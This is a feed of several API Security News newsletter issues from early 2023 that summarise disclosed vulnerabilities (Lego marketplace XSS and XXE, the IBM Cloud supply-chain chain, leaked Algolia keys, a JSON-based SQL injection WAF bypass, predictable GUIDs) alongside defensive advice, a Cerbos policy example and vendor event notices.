		<pubDate>Sun, 05 Mar 2023 16:22:36 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10383</guid>

					<description><![CDATA[<p>This week, we have news of API and web security flaws in the Lego marketplace, potentially allowing for a full account takeover. From NordicAPIs, we have a guide to seven examples of quality API style guides and coverage of the recent news from 42Crunch being admitted to the Microsoft Intelligent Security Association (MISA). Finally, we [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-215-api-flaws-lego-marketplace-api-style-guides-42crunch-joins-misa/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-215-api-flaws-lego-marketplace-api-style-guides-42crunch-joins-misa/">Issue 215: API flaws in Lego marketplace, API style guides, 42Crunch joins MISA</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of API and web security flaws in the Lego marketplace, potentially allowing for a full account takeover. From NordicAPIs, we have a guide to seven examples of quality API style guides and coverage of the recent news from 42Crunch being admitted to the Microsoft Intelligent Security Association (MISA). Finally, we have details of another addition to the burgeoning collection of deliberately vulnerable API applications.</p>
<h2>Vulnerability: API flaws in the Lego marketplace risk user data</h2>
<p><a href="https://www.darkreading.com/vulnerabilities-threats/api-flaws-lego-marketplace-user-accounts-data-at-risk" target="_blank" rel="noopener">First up this week is some excellent research</a> from Shiran Yodev (<a href="https://twitter.com/shrnyo" target="_blank" rel="noopener">@shrnyo</a>) into a series of vulnerabilities on the Lego platform, which, if exploited by a skilled attacker, could have led to an account takeover. The vulnerabilities were responsibly disclosed to Lego, who took immediate steps to address the issues found; no known exploits are known to have taken place.</p>
<p>The first issue discovered by Yodev was an instance of good old fashion Cross-Site-Scripting (XSS) on the search dialog on the Lego marketplace website. The advanced search page did not adequately sanitize user-supplied input and rendered an unsanitized search string to the user&#8217;s browser, allowing for a basic reflected XSS attack. Yodev attempted to use this XSS vulnerability to read the <code>document.cookie</code> but found that this was protected by the <code>HttpOnly</code> attribute on the cookie as per standard best practice for cookie protection.</p>
<p>Next up, Yodev discovered that the website used long-lived, unprotected, and exposed session IDs. He created a proof of concept to demonstrate how users could be tricked into clicking a link (exposed by the XSS flaw) which would forward their current session to his attack server resulting in a full account takeover.</p>
<p>Finally, Yodev observed that one of the pages allowed uploading an XML file in a specified format. Unfortunately, the platform had not restricted the support for XML External Entities on the server, which allowed Yodev to perform a simple attack that showed he could access arbitrary files on the local filesystem. With some refinement, he could access the underlying AWS EC2 credentials for the marketplace host. XML External Entities are a dangerous feature as they allow for the inclusion of arbitrary file content under the control of an attacker within the current XML parsing and rendering process.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10443" src="https://apisecurity.io/wp-content/uploads/2023/03/Article1.jpg" alt="" width="602" height="304" srcset="https://apisecurity.io/wp-content/uploads/2023/03/Article1.jpg 624w, https://apisecurity.io/wp-content/uploads/2023/03/Article1-300x151.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/03/Article1-320x162.jpg 320w, https://apisecurity.io/wp-content/uploads/2023/03/Article1-360x182.jpg 360w" sizes="auto, (max-width: 602px) 100vw, 602px" /></p>
<p>In conclusion, Yodev offers sound advice for preventing such attacks, namely:</p>
<ul>
<li>To prevent XSS, the golden rule is never to trust user input and ensure that input is properly sanitized and escaped.</li>
<li>Sessions IDs are potentially sensitive, and developers should not expose them or allow them to be hijacked.</li>
<li>Unless absolutely necessary, ensure that XML External Entities support is disabled.</li>
</ul>
<h2>Article: Seven examples of quality API style guides</h2>
<p>A consistent and uniform API design is essential to ensuring APIs that behave in standard ways, handle errors in the same way, and can be tested in a standard and consistent manner. This week, <a href="https://nordicapis.com/7-examples-of-quality-api-design-style-guides/" target="_blank" rel="noopener">NordicAPIs lists seven</a> of their most popular API style guides. Although somewhat ancillary to API security, a uniform API design will greatly aid the efforts of security teams in performing design and code reviews, and testing.</p>
<p>The two guides that stood out for me during a quick read-through were the <a href="https://docs.gitlab.com/ee/development/api_styleguide.html" target="_blank" rel="noopener">GitLab API style guide</a> and the wonderfully detailed <a href="https://stoplight.io/api-style-guides-guidelines-and-best-practices">Stoplight API style guide and best practices</a>. In particular, the latter provides excellent guidance on what to include in a style guide and how to ensure that these guidelines are enforced uniformly across an organization. They recommend using open-source Spectral guides and audits throughout the CI/CD lifecycle.</p>
<p>NordicAPIs produce several other excellent guides which are worth bookmarking, namely:</p>
<ul>
<li>Tips for <a href="https://nordicapis.com/11-tips-for-creating-an-api-style-guide/" target="_blank" rel="noopener">creating an API design style guide</a></li>
<li><a href="https://nordicapis.com/helpful-api-design-best-practices-and-tips/" target="_blank" rel="noopener">API best practices</a></li>
<li><a href="https://nordicapis.com/8-tips-for-designing-quality-rest-apis/" target="_blank" rel="noopener">REST design tips</a></li>
<li><a href="https://nordicapis.com/10-best-practices-for-naming-api-endpoints/" target="_blank" rel="noopener">Specific naming conventions</a></li>
</ul>
<p>Thanks to NordicAPIs for their valued contribution to the API community.</p>
<h2>News: 42Crunch expands Microsoft collaboration by joining MISA</h2>
<p>At the beginning of 2023, <a href="https://42crunch.com/42crunch-expands-microsoft-collaboration-by-joining-misa/" target="_blank" rel="noopener">42Crunch announced that it had joined</a> the Microsoft Intelligent Security Association (MISA), a group of security technology providers who have integrated their solutions with Microsoft’s security technology products to better defend against a world of increasing threats. 42Crunch has integrated with Microsoft Sentinel to provide enterprises with end-to-end API protection and visibility, critical to the success of their API-driven digital initiatives.</p>
<p><cite>“As a pioneer of the DevSecOps approach for API Security, 42Crunch is proud to join the Microsoft Intelligent Security Association and help organizations to ensure they have the tools they need to proactively defend against increasingly sophisticated threats in a digital world”</cite> said Jacques Declas, CEO of 42Crunch.</p>
<p>I have previously hosted webinars on the 42Crunch integration with Microsoft Sentinel (<a href="https://42crunch.com/actively-monitor-and-defend-your-apis-with-42crunch-and-the-azure-sentinel-platform/" target="_blank" rel="noopener">here</a> and <a href="https://42crunch.com/protect-your-apis-with-microsoft-azure-sentinel-and-42crunch-platforms/" target="_blank" rel="noopener">here</a>) if you want to see the integration in action. I&#8217;m particularly excited about the opportunity that this integration brings in allowing SOC security specialists to create sophisticated rules to detect advanced API attacks using the power of the Microsoft platform with all the advanced threat detection and analytics it provides.</p>
<h2>Tools: BankGround vulnerable API application now available as OSS</h2>
<p>Finally, this week, <a href="https://apimate.eu/bankground.html" target="_blank" rel="noopener">we have news</a> of another deliberately vulnerable API application which are always popular with our readers wishing to learn the skills of API hacking. BankGround is a banking playground and is an open-source project to learn REST/OpenAPI and GraphQL APIs. The project is the brainchild of Karel Husa, who also provides API security training and testing services.</p>
<p>The project looks extensive and well-designed, with an <a href="https://bankground.apimate.eu/" target="_blank" rel="noopener">OpenAPI definition</a> and a <a href="https://gitlab.com/karelhusa/bankground" target="_blank" rel="noopener">source code repository</a> in GitLab.</p>
<p>Thanks to Karel for contributing this project to the community.</p>
<h2>Webinar: Build Secure APIs in VS Code with Instant API Security Testing</h2>
<p>The DevSecOps movement has resulted in vendors providing developer tools inside their IDEs. Unfortunately, many security tools integrated into the IDE leave a lot to be desired &#8211; slow scanning times, noisy results, and no real added productivity value to busy developers. However, the 42Crunch VS Code API security audit integration is a complete game changer, evidenced by the nearly half a million downloads in the marketplace. Developers have come to love the powerful OpenAPI audit facilities, but with the recent release of this plugin, developers can now audit and test their APIs almost instantly as they code.</p>
<p>Join yours truly on 21 March 2023, at 8 am PST / 4 pm GMT, as I <a href="https://42crunch.com/instant-api-security-testing-vscode/" target="_blank" rel="noopener">demonstrate the new powerful features</a>:</p>
<ul>
<li>Audit existing OpenAPI definitions for data and security best practices.</li>
<li>Powerful remediation guidance from the industry’s largest OpenAPI knowledge base.</li>
<li>Validate the conformance of your API against the contract within seconds.</li>
<li>Identify any unexpected API behavior such as:
<ul>
<li>Incorrectly responding to undefined verbs.</li>
<li>Unexpected responses to error conditions.</li>
<li>Malformed responses to operations (excessive information exposure)</li>
<li>Incorrect handling of edge-case input (fuzzing of inputs).</li>
<li>Other undefined behavior.</li>
</ul>
</li>
</ul>
<p><a href="https://42crunch.com/instant-api-security-testing-vscode/" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="alignnone wp-image-10437" src="https://apisecurity.io/wp-content/uploads/2023/03/Article5-1024x268.jpg" alt="" width="629" height="164" srcset="https://apisecurity.io/wp-content/uploads/2023/03/Article5-1024x268.jpg 1024w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-300x79.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-768x201.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-1536x402.jpg 1536w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-320x84.jpg 320w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-640x168.jpg 640w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-360x94.jpg 360w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-720x189.jpg 720w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-1080x283.jpg 1080w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-800x210.jpg 800w, https://apisecurity.io/wp-content/uploads/2023/03/Article5-1280x335.jpg 1280w, https://apisecurity.io/wp-content/uploads/2023/03/Article5.jpg 1584w" sizes="auto, (max-width: 629px) 100vw, 629px" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-215-api-flaws-lego-marketplace-api-style-guides-42crunch-joins-misa/">Issue 215: API flaws in Lego marketplace, API style guides, 42Crunch joins MISA</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 214: Google Cloud&#8217;s four pillars of API security, Cerbos for API permissions, attacking predictable GUIDs</title>
		<link>https://apisecurity.io/issue-214-google-clouds-four-pillars-of-api-security-cerbos-for-api-permissions-attacking-predictable-guids/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 09 Feb 2023 19:18:31 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10301</guid>

					<description><![CDATA[<p>This week, we have views from the Google Cloud team on their four pillars of API security and a great article from the NewStack on using Cerbos to add permissions to your APIs. Dana Epp shares his thoughts on attacking predictable GUIDs when hacking APIs and, finally, a quick read on the developer&#8217;s need for [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-214-google-clouds-four-pillars-of-api-security-cerbos-for-api-permissions-attacking-predictable-guids/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-214-google-clouds-four-pillars-of-api-security-cerbos-for-api-permissions-attacking-predictable-guids/">Issue 214: Google Cloud&#8217;s four pillars of API security, Cerbos for API permissions, attacking predictable GUIDs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have views from the Google Cloud team on their four pillars of API security and a great article from the NewStack on using Cerbos to add permissions to your APIs. Dana Epp shares his thoughts on attacking predictable GUIDs when hacking APIs and, finally, a quick read on the developer&#8217;s need for integrated tooling.</p>
<h2>Article: Google Cloud&#8217;s four pillars of API security</h2>
<p>First up this week is <a href="https://cloud.google.com/blog/products/identity-security/build-your-api-security-strategy-on-these-4-pillars" target="_blank" rel="noopener noreferrer">an article from Google Cloud</a> where they share their four pillars for API security. The article highlights the findings from Google&#8217;s own Apigee platform and their 2022 report on API security insights and trends (<a href="https://apisecurity.io/issue-210-csrc-vulnerability-f5-supply-chain-attacks-hacking-apis-gcp-api-security-report/" target="_blank" rel="noopener noreferrer">featured here in issue 210</a>). From Apigee comes the finding that API traffic increased by 46% between 2019 and 2020. In 2021, more than half of organizations experienced a security threat related to APIs.</p>
<p>Google used its own research to identify the five top threats to APIs, namely:</p>
<ul>
<li><strong>Data scraping:</strong> exfiltrating excessive amounts of data via APIs by abusing pagination or enumeration schemes.</li>
<li><strong>Denial of service (DoS):</strong> attacking APIs (via volumetric attacks or distributed bots) to prevent legitimate access from users.</li>
<li><strong>Injections or malware:</strong> using APIs as a point of inject for either malware (for example, a file upload) or injection of malicious code.</li>
<li><strong>Account takeover (ATO):</strong> abusing password reset mechanism provided via APIs in order to take over accounts.</li>
<li><strong>Scalping and bots:</strong> bots can be automated to purchase limited availability goods or commodities for resale at elevated prices.</li>
</ul>
<p>The most telling findings from Google was that over 60% of organizations need to improve their API security strategy if they even have such a strategy in the first instance. According to Google, the two main challenges organizations face when building an API security strategy is a lack of resource (primarily human) and a lack of expertise.</p>
<p>Their four pillars of API security are:</p>
<ul>
<li>Basic API security controls and protections are enforced for all APIs through a central API management platform — a uniform baseline policy is applied to all APIs under governance without exception. This policy includes the basics such as transport security, rate-limiting, and bot defenses.</li>
<li>Protection against DDoS and exploits — leverage modern cloud protection suites that include WAFs, DDoS protection, and a threat intelligence capability.</li>
<li>Anti-bot protection — to keep APIs and exposed resources safe from fraudulent activity, spam, and abuse.</li>
<li>Use safe API coding principles — create a shift-left security culture where developers understand the importance of producing APIs that are secure by design.</li>
</ul>
<p>This is sound basic advice from Google — use defense in depth and ensure good coverage with good defaults, and build from there.</p>
<h2>Guide: Add access permissions to your API with Cerbos</h2>
<p>Poorly implemented API authorization leads to two of the most prominent classes of API security vulnerability: <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object-level authorization</a> and <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">API5:2019 — Broken function-level authorization</a>. As readers of this newsletter will know, the most frequent cause of this class of vulnerability is poorly implemented back-end permission controls. <a href="https://thenewstack.io/building-access-permissions-into-your-api/" target="_blank" rel="noopener noreferrer">In this guide from the New Stack</a>, the author discusses the benefits of using a standard authorization (or permissions) framework to ensure that access control is applied in a uniform and consistent manner.</p>
<p>The author highlights the most important benefit of an authorization framework — namely, that developers can focus on implementing functionality and rely on a central enforcement point to ensure that access policy is applied correctly. In this article, the author focuses on <em>Cerbos</em>, one of a number of open-source authorization frameworks using a basic Python Flask application.</p>
<p>There are three basic steps in setting up Cerbos, namely:</p>
<ul>
<li>Deploy and run Cerbos</li>
<li>Define your policies</li>
<li>Check permissions</li>
</ul>
<p>Policies are defined in an easily read markup language shown below:</p>
<pre class="line-numbers" data-start="1"><code class="language-yaml">---
apiVersion: "api.cerbos.dev/v1"
derived_roles:
  name: todo_derived_roles
  definitions:
    - name: admin
      parentRoles: ["admin"]
 
    - name: user_that_owns_the_record
      parentRoles: ["user"]
      condition:
        match:
          expr: request.resource.attr.user == request.principal.id
 
    - name: any_user
      parentRoles: ["user"]</code></pre>
<p>In the client code, the developer only needs to make a call to the central Cerbos server with the current user and target resource in order to determine if the user is allowed to access the resource. The decision logic is decoupled from the enforcement point, allowing for a more flexible and scalable solution overall.</p>
<p>There is no shortage of excellent authorization frameworks — make sure your developers are using these rather than re-inventing the wheel.</p>
<h2>Article: Attacking predictable GUIDs when hacking APIs</h2>
<p>One of the hallmarks of modern digital systems is the redoubtable <em>globally unique identifiers</em> (GUIDs) (also known as<em> universal unique identifiers</em> (UUIDs) ) which act as a unique identifier to underlying data or information. Think of a GUID as a pointer to information on a server — when a client access a resource, it is given a GUID to identify the resource (to point to it) in future transactions. If an attacker is able to guess a valid GUID they can quite easily launch attacks against a target system.</p>
<p><a href="https://danaepp.com/attacking-predictable-guids-when-hacking-apis" target="_blank" rel="noopener noreferrer">In one of his most recent articles</a>, the equally redoubtable Dana Epp provides a fascinating overview of how it is possible to attack systems using v1 GUIDs by predicting a range of valid GUIDs based on their predictability within a time window. Epp has even provided a Python script to generate candidate GUIDs, and perform time drift calculations to account for time differences between client and server.</p>
<p>As Epp concludes:</p>
<blockquote class="blockquote"><p>If you ever find a target API that is using v1 GUIDs in an endpoint, and that endpoint is relying on the GUID as part of its business logic, you have an opportunity to predict it, and pwn it.</p></blockquote>
<h2>Article: API security needs integrated tooling for developers</h2>
<p>Toward the end of 2022, the API World event was held in San Jose, bringing many of the luminaries of the industry to share their views on the future of the API industry. Needless to say, API security was front and center of the discussion, and 42Crunch was represented by our co-founder and field CTO Isabelle Mauny.</p>
<p><a href="https://www.techtarget.com/searchsoftwarequality/news/252526657/For-API-security-to-succeed-devs-need-integrated-tooling" target="_blank" rel="noopener noreferrer">In her keynote address</a> at the conference, she stressed the importance of a balanced view between a <em>shift-left</em> and, simultaneously, a <em>shift-right</em> approach to API security. Developers play a vital role in ensuring API security, and API security has never been more important. Experts believe developers need security tools integrated into workflows now.</p>
<p>According to Mauny:</p>
<blockquote class="blockquote"><p>&#8220;Empowering developers means that you&#8217;re going to give them specific tools made for them, not for security people,&#8221;</p></blockquote>
<h2>Event: 42Crunch at DeveloperWeek in SF Bay area, 15th &#8211; 17th February</h2>
<p>Next week I have the great privilege of presenting not once but twice at the Developer Week conference in the San Franciso Bay area from the 15th to the 17th of February.</p>
<p>The talks are as follows:</p>
<p><a href="https://developerweek2023.sched.com/event/1GODD?iframe=no">Are Your APIs Rugged?</a> —  Thursday, February 16, 2:30 pm &#8211; 2:55 pm PST</p>
<p><a href="https://developerweek2023.sched.com/event/1GOF6?iframe=no" target="_blank" rel="noopener noreferrer">Everything You Need to Know About API Security</a> — Friday, February 17 • 1:00 pm &#8211; 1:50 pm PST</p>
<p><a href="https://www.developerweek.com/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10394" src="https://apisecurity.io/wp-content/uploads/2023/02/Article5.jpg" alt="" width="604" height="154" srcset="https://apisecurity.io/wp-content/uploads/2023/02/Article5.jpg 921w, https://apisecurity.io/wp-content/uploads/2023/02/Article5-300x77.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/02/Article5-768x196.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/02/Article5-320x82.jpg 320w, https://apisecurity.io/wp-content/uploads/2023/02/Article5-640x163.jpg 640w, https://apisecurity.io/wp-content/uploads/2023/02/Article5-360x92.jpg 360w, https://apisecurity.io/wp-content/uploads/2023/02/Article5-720x184.jpg 720w, https://apisecurity.io/wp-content/uploads/2023/02/Article5-800x204.jpg 800w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-214-google-clouds-four-pillars-of-api-security-cerbos-for-api-permissions-attacking-predictable-guids/">Issue 214: Google Cloud&#8217;s four pillars of API security, Cerbos for API permissions, attacking predictable GUIDs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 213: Supply chain vulnerability in IBM Cloud, hardcoded API keys in Algolia portal, JSON-based SQL attacks</title>
		<link>https://apisecurity.io/issue-213-supply-chain-vulnerability-ibm-cloud-hardcoded-api-keys-algolia-portal-json-based-sql-attacks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 26 Jan 2023 18:43:16 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10278</guid>

					<description><![CDATA[<p>This week, we have news of three vulnerabilities. First up is a supply chain vulnerability in the IBM Cloud platform, which is reported to be the first of its kind to affect a cloud provider. The second is another case of hardcoded API keys, this time in the Algolia AI search portal, and the third [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-213-supply-chain-vulnerability-ibm-cloud-hardcoded-api-keys-algolia-portal-json-based-sql-attacks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-213-supply-chain-vulnerability-ibm-cloud-hardcoded-api-keys-algolia-portal-json-based-sql-attacks/">Issue 213: Supply chain vulnerability in IBM Cloud, hardcoded API keys in Algolia portal, JSON-based SQL attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of three vulnerabilities. First up is a supply chain vulnerability in the IBM Cloud platform, which is reported to be the first of its kind to affect a cloud provider. The second is another case of hardcoded API keys, this time in the Algolia AI search portal, and the third is a fantastic piece of research into a JSON-based SQL attack on WAFs. Finally, we have coverage of a report on the increase in attacks on shadow APIs.</p>
<h2>Vulnerability: Supply chain vulnerability in IBM Cloud</h2>
<p><a href="https://www.esecurityplanet.com/threats/ibm-cloud-supply-chain-vulnerability/" target="_blank" rel="noopener noreferrer">The first vulnerability this week</a> is, according to security researchers at Wix, the first of its kind affecting the public cloud. With some dramatic flair, the researchers coined the name &#8220;Hell&#8217;s Keychain&#8221; to describe their attack technique which is <a href="https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql" target="_blank" rel="noopener noreferrer">meticulously described in their blog</a>. The researchers released their findings to the IBM Cloud team, who responded promptly to close the issues. No public exploits of this vulnerability are suspected.</p>
<p>The vulnerability comprises a chain of three exposed secrets which can be combined, together with a poorly segregated network, to perform access to an underlying PostgreSQL database. The three exposed secrets were:</p>
<ul>
<li><strong>Kubernetes service account token:</strong> the researchers used an SQL Injection attack on the PostgreSQL database to obtain access to a command shell on the host from where they were able to inspect environments and discover Kubernetes tokens allowing access to a Kubernetes cluster.</li>
<li><strong>Container registry password:</strong> the researchers then discovered a secrets file containing various access credentials for a private container registry. Although not core to this vulnerability, this flaw could have enabled an attacker to access and modify the private container registry, possibly with rogue or malicious images.</li>
<li><strong>CI/CD server credentials:</strong> the researchers then discovered that they could scan container images for secrets which included the root credentials to the CI/CD systems, including FTP credentials and internal artifact repository credentials.</li>
</ul>
<p>In order to utilize these obtained credentials, the researchers attempted to access the internal resources and &#8211; to their surprise &#8211; discovered that this internal network was accessible from the PostgreSQL host. They determined this to result from poor network design, specifically not isolating subnets.</p>
<p>The researchers concluded with the following advice on how to prevent such vulnerabilities:</p>
<ul>
<li>Implement continuous monitoring of your environments for secrets — be sure to scan code and container repositories, CI/CD pipelines, documentation, and script files.</li>
<li>Use the network controls provided to isolate your production environment — despite access to all the credentials, this exploit could have been thwarted by using well-designed network segmentation.</li>
<li>Lock down your container registry — limit access to your container registry to prevent container corruption.</li>
</ul>
<p>This research shows how easily a talented attacker can pivot between multiple systems, harvesting secrets along the way which can be used to devastating effect. I would definitely recommend reading the full reported from Wiz.</p>
<h2>Vulnerability: Hardcoded API keys in Algolia portal</h2>
<p>Almost every other week features news of a supply chain vulnerability related to leaked API credentials. This week is no exception — it&#8217;s the turn of the Algolia AI search portal <a href="https://portswigger.net/daily-swig/deserialized-web-security-roundup-algolia-api-key-leak-github-cve-reporting-scoring-cvss-scores" target="_blank" rel="noopener noreferrer">covered recently by PortSwigger</a>. The <a href="https://cloudsek.com/whitepapers_reports/hardcoded-algolia-api-keys-could-be-exploited-by-threat-actors-to-steal-millions-of-users-data/" target="_blank" rel="noopener noreferrer">security research team at CloudSEK revealed</a> that over 1550 applications were found to be leaking API keys and application IDs for the popular AI search platform. Even worse, the researchers discovered that some applications (57 at last count) had hardcoded highly critical Algolia <em>Admin</em> API keys. Obviously this type of leakage is particularly serious as it allows an attacker to gain full access to the tenant, including the ability to read private user information and usage and search histories.</p>
<p>The researchers made the following suggestions for dealing with leaked API credentials:</p>
<ul>
<li>Ensure that the credentials are revoked as soon as possible.</li>
<li>Ensure that clients are designed and implemented with security in mind — API credentials are highly sensitive and should be stored securely.</li>
<li>When communicating with a sensitive API, use a proxy pattern to prevent direct access to the sensitive API, instead, allow the exposed API to do this communication on your behalf to prevent the leakage of high-sensitivity credentials.</li>
</ul>
<h2>Vulnerability: JSON-based SQL allows WAF bypass</h2>
<p>We are still in January, and we have a contender for the top security write-up of 2023 — Noam Moshe of the Claroty Research team on<a href="https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf" target="_blank" rel="noopener noreferrer"> {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF</a>. I&#8217;d recommend reading the article in detail; in essence, the bypass works as follows: WAFs can protect against SQL Injection by doing a simple pattern match in the incoming payloads. The researcher discovered that he could exploit the built-in support for JSON in most SQL engines to bypass the most popular WAFs, which did not anticipate SQL Injection payloads within the JSON body. This highlights the perils of the negative security model and the folly of using block lists.</p>
<p>The researcher discovered that whilst the majority of SQL database providers (PostgreSQL, MySQL, SQLite, and MS-SQL) have supported embedded JSON within queries for over a decade, the majority of popular WAFs do not parse JSON payloads in queries. The researcher tested against Palo Alto Networks, Amazon Web Services, Cloudflare, F5, and Imperva and found that whilst they defend adequately against SQL Injection in the raw query, but were blind to it when wrapped within a JSON object. All five vendors have been notified and are reported to have released updates that address the issues identified.</p>
<p>For me, this report illustrates two important considerations:</p>
<ul>
<li>Security tooling will always be on the back foot in addressing new attack vectors enabled by new features — in this case, over a decade had passed before being addressed.</li>
<li>The negative security model will always lack precision and be prone to missing attacks. Where possible, consider using the positive security model working against a precise allow list.</li>
</ul>
<p>Thanks to Noam Moshe for this excellent research and accompanying write-up.</p>
<h2>Article: Attacks on shadow APIs on the increase</h2>
<p>Finally, this week, <a href="https://cybersecurity-magazine.com/attacks-on-shadow-apis-loom-large/" target="_blank" rel="noopener noreferrer">we have a quick read</a> on the rise of attacks against shadow APIs. The topic of shadow APIs is a rising concern to security teams as the volume of APIs continues to increase. Due to the relative ease of creating and deploying APIs, zealous product developers are opting to release APIs outside of the standard, governed processes driving a rise in the number of these shadow APIs. Unfortunately, attackers have become wise to this fact and are focusing their efforts on these APIs which may be less rigorously designed, secured, and monitored.</p>
<p>The report indicated that an analysis of 20 billion transactions in the first two quarters of 2022 found that 16.7 billion of these were malicious and that up to 5 billion targeted shadow APIs. Although the report concludes that this is a rising problem, it concedes that this is one of the hardest problems facing API security today.</p>
<p>My recommendation is a combined strategy of governance (to prevent new shadow APIs) and API discovery (to identify existing shadow APIs).</p>
<h2>Webinar: Protect Your APIs with Microsoft Azure Sentinel and 42Crunch Platforms</h2>
<p>In the first of two events this week, I will present a webinar on how to use the recently released <a href="https://azuremarketplace.microsoft.com/en-us/marketplace/apps/42crunch1580391915541.42crunch_sentinel_solution?tab=Overview&amp;exp=ubp8" target="_blank" rel="noopener noreferrer">42Crunch marketplace integration with Microsoft Sentinel</a> to provide comprehensive monitoring, detection, and prevention of your API endpoints. The webinar will feature some walkthroughs of practical attacks and how to detect them —<a href="https://42crunch.com/protect-your-apis-with-microsoft-azure-sentinel-and-42crunch-platforms/" target="_blank" rel="noopener noreferrer"> be sure to reserve your place</a> for next week January 31, 2023  (8am PST / 4pm GMT).</p>
<p>This full agenda includes the following:</p>
<ul>
<li>Showcasing features of the new 42Crunch Microsoft Sentinel marketplace plugin.</li>
<li>Creating alerts on common API threat conditions.</li>
<li>Enrichment of API logs with threat intelligence data</li>
<li>Detecting attack patterns for common adversarial tools.</li>
<li>Using threat hunting to detect API attacks.</li>
<li>Understanding of common bot behaviors and detection techniques.</li>
<li>Generating notifications to 3rd party alerting services.</li>
</ul>
<p><a href="https://42crunch.com/protect-your-apis-with-microsoft-azure-sentinel-and-42crunch-platforms/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10364" src="https://apisecurity.io/wp-content/uploads/2023/01/Article5-1024x254.jpg" alt="" width="600" height="149" srcset="https://apisecurity.io/wp-content/uploads/2023/01/Article5-1024x254.jpg 1024w, https://apisecurity.io/wp-content/uploads/2023/01/Article5-300x74.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/01/Article5-768x190.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/01/Article5-320x79.jpg 320w, https://apisecurity.io/wp-content/uploads/2023/01/Article5-640x158.jpg 640w, https://apisecurity.io/wp-content/uploads/2023/01/Article5-360x89.jpg 360w, https://apisecurity.io/wp-content/uploads/2023/01/Article5-720x178.jpg 720w, https://apisecurity.io/wp-content/uploads/2023/01/Article5-1080x267.jpg 1080w, https://apisecurity.io/wp-content/uploads/2023/01/Article5-800x198.jpg 800w, https://apisecurity.io/wp-content/uploads/2023/01/Article5.jpg 1244w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h2>Event: 42Crunch and GitHub at CloudNativeSecurityCon North America</h2>
<p>Attending #CloudNativeSecurityCon next week? Then join GitHub and 42Crunch for a networking reception of crafted cocktails and fine food and maybe a little chat about your API security options! Places are limited, <a href="https://resources.github.com/github-at-cloudnativesecuritycon-2023/" target="_blank" rel="noopener noreferrer">so register now</a>.</p>
<p><a href="https://www.linkedin.com/posts/42crunch_cloudnativesecuritycon-cnscon-cloudsecurity-activity-7024055497599131648-OWSL/?utm_source=share&amp;utm_medium=member_desktop" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10365" src="https://apisecurity.io/wp-content/uploads/2023/01/Article6.jpg" alt="" width="600" height="343" srcset="https://apisecurity.io/wp-content/uploads/2023/01/Article6.jpg 800w, https://apisecurity.io/wp-content/uploads/2023/01/Article6-300x171.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/01/Article6-768x439.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/01/Article6-320x183.jpg 320w, https://apisecurity.io/wp-content/uploads/2023/01/Article6-640x366.jpg 640w, https://apisecurity.io/wp-content/uploads/2023/01/Article6-360x206.jpg 360w, https://apisecurity.io/wp-content/uploads/2023/01/Article6-720x411.jpg 720w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
